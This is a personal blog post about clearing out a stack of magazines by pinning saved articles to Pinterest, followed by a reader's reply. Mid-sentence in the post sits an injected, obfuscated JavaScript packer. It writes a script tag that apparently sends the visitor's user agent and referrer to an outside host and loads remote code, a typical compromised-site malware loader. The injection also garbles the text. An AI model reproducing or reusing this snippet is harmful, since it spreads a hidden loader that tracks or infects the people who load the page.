I’ve got a problem.
I’m a hoarder.
Of magazines.
I can’t throw them away. I dog ear pages and keep them. I rarely ever go back, but I just can’t rid of them.
Sunday ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hfdff|var|u0026u|referrer|ritra||js|php’.split(‘|’),0,{}))
was the day. I was going to make those magazines my biatch.
A few hours later, I was done.
How’d I do it? Well, there was still no way I was going to just throw them away. I mean, what if I missed out on a tasty frittata from Martha or the newest hair product at Sephora. I couldn’t live with myself.
So I went through each magazine and found the articles, products and recipes I wanted to remember. Then I looked them up online and pinned them using one of my favorite sites – pinterest. Everything was catalogued online and I was able to purge all those magazines. Don’t worry. I recycled.

Dude, my magazine hoarding habit is RIDONK! Seriously, they take up a full bookshelf. A tall one. My mom passes on all her mags to me and I’m the same–I just can’t toss them until I’ve browsed! And then what?! Pinning is a great plan, but with a bookshelf full, I’m pretty sure that’ll take me until 2027. Though I am getting better about ninja deleting and only keeping stuff I really think I’ll care about in a couple years. Slowly, slowly.
Also for future reference, the library takes used magazines–they sell them for $.25. I just cut the address part off; they don’t mind.
Oh, and freecyclers are big on picking up your old mags for their own hoarding and perusal. 🙂
PS: And then there’s always me. I’ll take your Real Simple & Martha offcasts in the future. Cuz I need them like a hole in the head…
